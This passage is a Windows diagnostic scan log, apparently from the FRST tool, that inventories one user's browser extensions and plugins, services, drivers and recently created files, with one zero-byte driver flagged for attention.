BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-19]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-11-18]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 a0l0qh6b; C:\Windows\System32\Drivers\a0l0qh6b.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 15:28 - 2019-11-19 15:32 - 000043356 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-19 14:43 - 2019-11-19 14:43 - 000004629 _____ C:\Users\Vladana\Desktop\Fixlog.txt
2019-11-19 01:50 - 2019-11-19 15:23 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:50 - 2019-11-19 15:23 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:39 - 2019-11-19 14:36 - 000000000 ____D C:\Users\Vladana\Desktop\Old
2019-11-18 21:23 - 2019-11-18 21:23 - 000001001 _____ C:\Users\Vladana\Desktop\iPool.lnk
2019-11-18 14:24 - 2019-11-19 15:31 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 16:40 - 2019-11-18 19:26 - 000000000 ____D C:\ProgramData\Hotspot Shield
